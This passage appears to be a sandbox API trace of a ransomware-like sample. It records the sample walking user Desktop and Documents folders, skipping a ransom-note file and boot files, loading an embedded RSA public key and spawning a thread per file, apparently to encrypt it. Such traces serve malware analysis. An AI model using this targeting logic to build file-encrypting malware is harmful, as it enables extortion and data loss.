lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\" [0035.536] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\", lpString2="3Yo4kg3p-K" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K" [0035.536] SetErrorMode (uMode=0x1) returned 0x1 [0035.536] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K" [0035.536] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\" [0035.536] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\" [0035.536] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\*.*" [0035.536] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x324cb8 [0035.536] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K") returned="3Yo4kg3p-K" [0035.536] lstrcpyW (in: lpString1=0x17a5a4, lpString2="3Yo4kg3p-K" | out: lpString1="3Yo4kg3p-K") returned="3Yo4kg3p-K" [0035.536] FindNextFileW (in: hFindFile=0x324cb8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0035.536] FindNextFileW (in: hFindFile=0x324cb8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0035.536] FindNextFileW (in: hFindFile=0x324cb8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0035.536] lstrcmpW (lpString1="6IAM.m4a", lpString2="..") returned 1 [0035.536] lstrcmpW (lpString1="6IAM.m4a", lpString2=".") returned 1 [0035.536] StrStrW (lpFirst="6IAM.m4a", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.536] StrStrW (lpFirst="6IAM.m4a", lpSrch="ntldr") returned 0x0 [0035.536] StrStrW (lpFirst="6IAM.m4a", lpSrch="NTLDR") returned 0x0 [0035.536] StrStrW (lpFirst="6IAM.m4a", lpSrch="NTDETECT.COM") returned 0x0 [0035.536] StrStrW (lpFirst="6IAM.m4a", lpSrch="ntdetect.com") returned 0x0 [0035.536] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\", lpSrch="Desktop") returned="Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\" [0035.536] FindNextFileW (in: hFindFile=0x324cb8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0035.536] lstrcmpW (lpString1="7IFRA25.gif", lpString2="..") returned 1 [0035.536] lstrcmpW (lpString1="7IFRA25.gif", lpString2=".") returned 1 [0035.536] StrStrW (lpFirst="7IFRA25.gif", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.536] StrStrW (lpFirst="7IFRA25.gif", lpSrch="ntldr") returned 0x0 [0035.536] StrStrW (lpFirst="7IFRA25.gif", lpSrch="NTLDR") returned 0x0 [0035.536] StrStrW (lpFirst="7IFRA25.gif", lpSrch="NTDETECT.COM") returned 0x0 [0035.536] StrStrW (lpFirst="7IFRA25.gif", lpSrch="ntdetect.com") returned 0x0 [0035.536] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\", lpSrch="Desktop") returned="Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\" [0035.536] FindNextFileW (in: hFindFile=0x324cb8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0035.536] lstrcmpW (lpString1="zd0bLbxkM-mx4VZDX_.flv", lpString2="..") returned 1 [0035.536] lstrcmpW (lpString1="zd0bLbxkM-mx4VZDX_.flv", lpString2=".") returned 1 [0035.536] StrStrW (lpFirst="zd0bLbxkM-mx4VZDX_.flv", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.536] StrStrW (lpFirst="zd0bLbxkM-mx4VZDX_.flv", lpSrch="ntldr") returned 0x0 [0035.536] StrStrW (lpFirst="zd0bLbxkM-mx4VZDX_.flv", lpSrch="NTLDR") returned 0x0 [0035.536] StrStrW (lpFirst="zd0bLbxkM-mx4VZDX_.flv", lpSrch="NTDETECT.COM") returned 0x0 [0035.537] StrStrW (lpFirst="zd0bLbxkM-mx4VZDX_.flv", lpSrch="ntdetect.com") returned 0x0 [0035.537] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\", lpSrch="Desktop") returned="Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\" [0035.537] FindNextFileW (in: hFindFile=0x324cb8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0035.537] FindClose (in: hFindFile=0x324cb8 | out: hFindFile=0x324cb8) returned 1 [0035.537] FindClose (in: hFindFile=0x324cb8 | out: hFindFile=0x324cb8) returned 0 [0035.537] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K" [0035.537] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\*.*" [0035.537] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\", lpSrch="Desktop") returned="Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\" [0035.537] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x324cb8 [0035.537] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K") returned="3Yo4kg3p-K" [0035.537] lstrcpyW (in: lpString1=0x17a5a4, lpString2="3Yo4kg3p-K" | out: lpString1="3Yo4kg3p-K") returned="3Yo4kg3p-K" [0035.537] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0035.537] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0035.537] FindNextFileW (in: hFindFile=0x324cb8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0035.537] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0035.537] FindNextFileW (in: hFindFile=0x324cb8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0035.537] lstrcmpW (lpString1="0zRcyBT06WYN8R-glJ0", lpString2="..") returned 1 [0035.537] lstrcmpW (lpString1="0zRcyBT06WYN8R-glJ0", lpString2=".") returned 1 [0035.537] lstrcpyW (in: lpString1=0x17b430, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K" [0035.537] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\" [0035.537] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\", lpString2="0zRcyBT06WYN8R-glJ0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0" [0035.537] SetErrorMode (uMode=0x1) returned 0x1 [0035.537] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0" [0035.537] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\" [0035.537] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\" [0035.537] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\*.*" [0035.537] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\*.*", lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 0x324cf8 [0035.537] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0") returned="0zRcyBT06WYN8R-glJ0" [0035.537] lstrcpyW (in: lpString1=0x179504, lpString2="0zRcyBT06WYN8R-glJ0" | out: lpString1="0zRcyBT06WYN8R-glJ0") returned="0zRcyBT06WYN8R-glJ0" [0035.538] FindNextFileW (in: hFindFile=0x324cf8, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0035.538] FindNextFileW (in: hFindFile=0x324cf8, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0035.538] lstrcmpW (lpString1="8P6C FwpZ.mkv", lpString2="..") returned 1 [0035.538] lstrcmpW (lpString1="8P6C FwpZ.mkv", lpString2=".") returned 1 [0035.538] StrStrW (lpFirst="8P6C FwpZ.mkv", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.538] StrStrW (lpFirst="8P6C FwpZ.mkv", lpSrch="ntldr") returned 0x0 [0035.538] StrStrW (lpFirst="8P6C FwpZ.mkv", lpSrch="NTLDR") returned 0x0 [0035.538] StrStrW (lpFirst="8P6C FwpZ.mkv", lpSrch="NTDETECT.COM") returned 0x0 [0035.538] StrStrW (lpFirst="8P6C FwpZ.mkv", lpSrch="ntdetect.com") returned 0x0 [0035.538] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\", lpSrch="Desktop") returned="Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\" [0035.538] FindNextFileW (in: hFindFile=0x324cf8, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0035.538] lstrcmpW (lpString1="8W8bO.gif", lpString2="..") returned 1 [0035.538] lstrcmpW (lpString1="8W8bO.gif", lpString2=".") returned 1 [0035.538] StrStrW (lpFirst="8W8bO.gif", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.538] StrStrW (lpFirst="8W8bO.gif", lpSrch="ntldr") returned 0x0 [0035.538] StrStrW (lpFirst="8W8bO.gif", lpSrch="NTLDR") returned 0x0 [0035.538] StrStrW (lpFirst="8W8bO.gif", lpSrch="NTDETECT.COM") returned 0x0 [0035.538] StrStrW (lpFirst="8W8bO.gif", lpSrch="ntdetect.com") returned 0x0 [0035.538] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\", lpSrch="Desktop") returned="Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\" [0035.538] FindNextFileW (in: hFindFile=0x324cf8, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0035.538] lstrcmpW (lpString1="lTddMw6tEfsH.wav", lpString2="..") returned 1 [0035.538] lstrcmpW (lpString1="lTddMw6tEfsH.wav", lpString2=".") returned 1 [0035.538] StrStrW (lpFirst="lTddMw6tEfsH.wav", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.538] StrStrW (lpFirst="lTddMw6tEfsH.wav", lpSrch="ntldr") returned 0x0 [0035.538] StrStrW (lpFirst="lTddMw6tEfsH.wav", lpSrch="NTLDR") returned 0x0 [0035.538] StrStrW (lpFirst="lTddMw6tEfsH.wav", lpSrch="NTDETECT.COM") returned 0x0 [0035.538] StrStrW (lpFirst="lTddMw6tEfsH.wav", lpSrch="ntdetect.com") returned 0x0 [0035.538] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\", lpSrch="Desktop") returned="Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\" [0035.538] FindNextFileW (in: hFindFile=0x324cf8, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 0 [0035.538] FindClose (in: hFindFile=0x324cf8 | out: hFindFile=0x324cf8) returned 1 [0035.538] FindClose (in: hFindFile=0x324cf8 | out: hFindFile=0x324cf8) returned 0 [0035.538] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0" [0035.538] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\*.*" [0035.538] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\", lpSrch="Desktop") returned="Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\" [0035.538] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0\\*.*", lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 0x324cf8 [0035.538] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\0zRcyBT06WYN8R-glJ0") returned="0zRcyBT06WYN8R-glJ0" [0035.539] lstrcpyW (in: lpString1=0x179504, lpString2="0zRcyBT06WYN8R-glJ0" | out: lpString1="0zRcyBT06WYN8R-glJ0") returned="0zRcyBT06WYN8R-glJ0" [0035.539] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0035.539] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0035.539] FindNextFileW (in: hFindFile=0x324cf8, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0035.539] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0035.539] FindNextFileW (in: hFindFile=0x324cf8, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0035.539] FindNextFileW (in: hFindFile=0x324cf8, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0035.539] FindNextFileW (in: hFindFile=0x324cf8, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0035.539] FindNextFileW (in: hFindFile=0x324cf8, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 0 [0035.539] FindClose (in: hFindFile=0x324cf8 | out: hFindFile=0x324cf8) returned 1 [0035.539] FindClose (in: hFindFile=0x324cf8 | out: hFindFile=0x324cf8) returned 0 [0035.539] FindNextFileW (in: hFindFile=0x324cb8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0035.539] FindNextFileW (in: hFindFile=0x324cb8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0035.539] FindNextFileW (in: hFindFile=0x324cb8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0035.539] FindNextFileW (in: hFindFile=0x324cb8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0035.539] FindClose (in: hFindFile=0x324cb8 | out: hFindFile=0x324cb8) returned 1 [0035.539] FindClose (in: hFindFile=0x324cb8 | out: hFindFile=0x324cb8) returned 0 [0035.539] FindNextFileW (in: hFindFile=0x324c38, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0035.539] FindNextFileW (in: hFindFile=0x324c38, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0035.539] FindNextFileW (in: hFindFile=0x324c38, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0035.539] FindNextFileW (in: hFindFile=0x324c38, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0035.539] FindClose (in: hFindFile=0x324c38 | out: hFindFile=0x324c38) returned 1 [0035.539] FindClose (in: hFindFile=0x324c38 | out: hFindFile=0x324c38) returned 0 [0035.539] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.539] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.539] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.539] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0035.539] FindClose (in: hFindFile=0x324878 | out: hFindFile=0x324878) returned 1 [0035.539] FindClose (in: hFindFile=0x324878 | out: hFindFile=0x324878) returned 0 [0035.540] FindNextFileW (in: hFindFile=0x324738, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0035.540] lstrcmpW (lpString1="Documents", lpString2="..") returned 1 [0035.540] lstrcmpW (lpString1="Documents", lpString2=".") returned 1 [0035.540] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0035.540] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0035.540] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Documents" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0035.540] SetErrorMode (uMode=0x1) returned 0x1 [0035.540] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0035.540] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0035.540] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0035.540] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" [0035.540] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x324878 [0035.540] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="Documents" [0035.540] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Documents" | out: lpString1="Documents") returned="Documents" [0035.540] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.540] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.540] lstrcmpW (lpString1="4geU.pptx", lpString2="..") returned 1 [0035.540] lstrcmpW (lpString1="4geU.pptx", lpString2=".") returned 1 [0035.540] StrStrW (lpFirst="4geU.pptx", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.540] StrStrW (lpFirst="4geU.pptx", lpSrch="ntldr") returned 0x0 [0035.540] StrStrW (lpFirst="4geU.pptx", lpSrch="NTLDR") returned 0x0 [0035.540] StrStrW (lpFirst="4geU.pptx", lpSrch="NTDETECT.COM") returned 0x0 [0035.540] StrStrW (lpFirst="4geU.pptx", lpSrch="ntdetect.com") returned 0x0 [0035.540] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0035.540] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0035.540] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0035.540] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0035.540] lstrcpyW (in: lpString1=0x17cf1c, lpString2="4geU.pptx" | out: lpString1="4geU.pptx") returned="4geU.pptx" [0035.540] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0035.540] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x424 